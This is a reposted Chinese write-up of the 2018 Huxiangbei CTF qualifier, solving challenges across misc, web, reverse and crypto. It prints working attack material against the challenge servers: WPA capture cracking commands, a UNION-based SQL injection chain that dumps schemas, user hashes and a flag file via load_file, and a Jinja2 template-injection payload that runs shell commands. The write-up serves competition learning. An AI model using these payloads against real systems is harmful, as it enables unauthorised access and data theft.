2018湖湘杯海选复赛Writeup

news/2024/7/3 3:14:54

2018湖湘杯Writeup

  • 0x01 签到题
  • 0x02 MISC Flow
  • 0x03 WEB Code Check
  • 0x04 WEB Readflag
  • 0x05 WEB XmeO
  • 0x06 Reverse Replace
  • 0x07 MISC Disk
  • 0x08 Crypto Common Crypto
  • 0x09 Reverse HighwayHash64
  • 0x10 Web Mynot

0x01 签到题

关注合天智汇公众号,回复hxb2018得到flag。

0x02 MISC Flow

解题思路、相关代码和Flag截图:
下载流量包后使用Wireshark打开发现是无线数据包:

aircrack-ng ctf.pcap
aircrack-ng ctf.pcap -w password-top1000.txt
airdecap-ng ctf.pcap -e ctf -p password1

使用Wireshark分析ctf-dec.pacp
在这里插入图片描述

0x03 WEB Code Check

解题思路、相关代码和Flag截图:
查看http://39.108.176.234:49882/news/路径发现源代码:通过分析写出加密脚本:

from Crypto.Cipher import AES
import base64
def encrypt(context):cryptor = AES.new('ydhaqPQnexoaDuW3',AES.MODE_CBC,'2018201920202021')context = context + 'hxb2018'if (len(context)%16 != 0 ):add = 16 - (len(context) % 16)else:add = 0context = context + ('\0' * add)return base64.b64encode(base64.b64encode(cryptor.encrypt(context)))
while True:test = str(raw_input("please input:"))print encrypt(test)

最后通过sql得到flag:

-1 union select 1,load_file('/var/www/flag.php'),3,4 -- 
-1 union select 1,load_file('/var/www/flag.php'),3,4 -- 
union select 1,group_concat(schema_name),3 from information_schema.schemata
-1 union select 1,2,version(),4 --
-1 union select 1,group_concat(schema_name),3,4 from information_schema.schemata -- 
mozhe_discuz_stormgroup
-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_discuz_stormgroup' --
notice,notice2,stormgroup_member
-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='stormgroup_member' --
id,name,password,status
-1 union select 1,name,password,4 from stormgroup_member where id=1 --
mozhe1
356f589a7df439f6f744ff19bb8092c0
-1 union select 1,name,password,4 from stormgroup_member where id=2 --
-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='notice' --
id,title,content,time
-1 union select 1,id,title,4 from notice2 where id=1 --
-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='notice2' --

在这里插入图片描述

在这里插入图片描述

0x04 WEB Readflag

解题思路、相关代码和Flag截图:
打开之后题目提示使用url-ssrf:
测试发现存在web.php:
在这里插入图片描述
根据提示存在readflag。但是访问是乱码,猜测使用c语言编译后的,访问readflag.c
在这里插入图片描述
发现该程序读取的是flag文件,访问得到flag:
在这里插入图片描述

0x05 WEB XmeO

解题思路、相关代码和Flag截图:
提交payload:{{''.__class__.__mro__.__getitem__(2).__subclasses__().pop(59).__init__.func_globals.linecache.os.popen('grep -nir hxb2018').read()}}
在这里插入图片描述
ssti服务器端模版注入获得flag。
在这里插入图片描述

0x06 Reverse Replace

解题思路、相关代码和Flag截图:
逆向程序逻辑
在这里插入图片描述

test1 = "637c777bf36b6fc53001672bfed7ab76ca82c97dfa5947f0add4a2af9ca472c0b7fd9326363ff7cc34a5e5f171d8311504c723c31896059a071280e2eb27b27509832c1a1b6e5aa0523bd6b329e32f8453d100ed20fcb15b6acbbe394a4c58cfd0efaafb434d338545f9027f503c9fa851a3408f929d38f5bcb6da2110fff3d2cd0c13ec5f974417c4a77e3d645d197360814fdc222a908846eeb814de5e0bdbe0323a0a4906245cc2d3ac629195e479e7c8376d8dd54ea96c56f4ea657aae08ba78252e1ca6b4c6e8dd741f4bbd8b8a703eb5664803f60e613557b986c11d9ee1f8981169d98e949b1e87e9ce5528df8ca1890dbfe6426841992d0fb054bb1648".decode('hex')test2 = '3350ef85212045c78fcfedf93c51504dcf004d51c7effbc3cf6e9ffb0443c3ff'.decode('hex')for tet in test2:if tet in test1:print(chr(test1.index(tet))),

获得flag:
在这里插入图片描述

0x07 MISC Disk

解题思路、相关代码和Flag截图:
在这里插入图片描述
搜索flag发现如上:
在这里插入图片描述
将这些十六进制当作二进制拼接起来即可得到flag:
0110011001101100011000010110011101111011001101000100010001010011010111110011000101101110010111110100010000110001011100110110101101111101
得到:flag{4DS_1n_D1sk}

0x08 Crypto Common Crypto

解题思路、相关代码和Flag截图:
通过分析可以得到这个程序是用aes加密了一部分flag。以下是AES S盒:
在这里插入图片描述
AES密钥
在这里插入图片描述
编写脚本解密:

from Crypto.Cipher import AES
key = '\x1b\x2e\x35\x46\x58\x6e\x72\x86\x9b\xa7\xb5\xc8\xd9\xef\xff\x0c'
ciphertext = raw_input('please input ciphertext:').decode('hex')
decodesys = AES.new(key)
print decodesys.decrypt(ciphertext)[:16] + ciphertext[-16:] + '}'

在这里插入图片描述

0x09 Reverse HighwayHash64

解题思路、相关代码和Flag截图:
在这里插入图片描述

在这里插入图片描述
修改一下HighwayHashReset函数
在这里插入图片描述
是用脚本解密:
在这里插入图片描述

   while (1){mstest(buffer, 0, 1024);sprintf(buffer, "%0.10lld", count);ret = HighwayHash64(buffer, 10, key);if (0x1CCB25A666AC646B == ret){printf("flag this= %s\n", buffer);break;}if (count % 10000000 == 0){printf("now testing = %s\n", buffer);}count ++;}

flag:hxb2018{3205649871}

0x10 Web Mynot

解题思路、相关代码和Flag截图:
首先上传一个图片。发现cookie中存在反序列化字段。
在这里插入图片描述
在这里插入图片描述
修改cookie中的picture。
在这里插入图片描述
base64解密之后:<?php
$flag = “hxb2018{b05c25bb0431166321eed47ebf968b89}”;
echo “flag{This_flag_iS_A_F4ke_flag}”;

得到flag:hxb2018{b05c25bb0431166321eed47ebf968b89}


http://lihuaxi.xjx100.cn/news/238816.html

相关文章

区块链技术简介

想知道更多区块链技术知识&#xff0c;请百度【链客区块链技术问答社区】链客&#xff0c;有问必答&#xff01;&#xff01;我最近看区块链简单介绍的时候会发现有的人就说其有良好的隐私性&#xff0c;但也有人说保护隐私性上有缺陷&#xff0c;今天就简单的对区块链的隐私做…

DELL RAID卡管理工具 MegaRAID Storage Manager(偏重RAID常用管理命令)

前言&#xff1a; 业务生产中大部分服务器RAID控制器使用的LSI产品&#xff0c;例如服务器&#xff1a;DELL、IBM、HP、浪潮、联想、华为。本文主要针对行业主流服务器DELL系列RAID卡管理&#xff0c;借住LSI产品管理软件MegaRAID Storage Manager &#xff08;以下简称MSM&…

矩阵专职_新的篇章开始了-我将以专职技术作家的身份加入RunCloud

矩阵专职If you used to submit (or read) articles on the freeCodeCamp Medium publication, there is a chance that your article may have been edited by me (or by another member of the team of volunteer editors).如果您以前曾经在freeCodeCamp Medium出版物上提交(…

vue:虚拟dom的实现

Vitual DOM是一种虚拟dom技术&#xff0c;本质上是基于javascript实现的&#xff0c;相对于dom对象&#xff0c;javascript对象更简单&#xff0c;处理速度更快&#xff0c;dom树的结构&#xff0c;属性信息都可以很容易的用javascript对象来表示&#xff1a; let element{tagN…

Mac MySQL配置环境变量的两种方法

第一种&#xff1a; 1.打开终端,输入&#xff1a; cd ~ 会进入~文件夹 2.然后输入&#xff1a;touch .bash_profile 回车执行后&#xff0c; 3.再输入&#xff1a;open -e .bash_profile 会在TextEdit中打开这个文件&#xff08;如果以前没有配置过环境变量&#xff0c;那么这…

再谈HOST文件

前几天弄了一个关于禁止打开某个网站的文章后&#xff0c;觉得这个HOST文件真的挺有意思的。并且也总是想把自己对它新的理解写下来&#xff08;也许大家都明白了&#xff09;以下是HOST文件的内容&#xff1a;# Copyright (c) 1993-1999 Microsoft Corp.## This is a sample H…

Dubbo配置文件详解

为新项目练手&#xff0c;把项目中用到的web service、RMI的服务改用DubboZookeeperSpring&#xff0c;网上找到几篇不错的配置详解 1.此篇博文主要从以下几种配置方式来讲 XML 配置文件方式、XML 配置文件方式、annotation 配置方式 https://www.cnblogs.com/chanshuyi/p/514…

phpinfo 信息利用

0x01 基础信息 1.system info:提供详细的操作系统信息&#xff0c;为提权做准备。 2.extension_dir:php扩展的路径 3.$_SERVER[‘HTTP_HOST’]:网站真实IP、CDN什么的都不存在的&#xff0c;找到真实ip&#xff0c;扫一扫旁站&#xff0c;没准就拿下几个站。 4.$_SERVER[‘…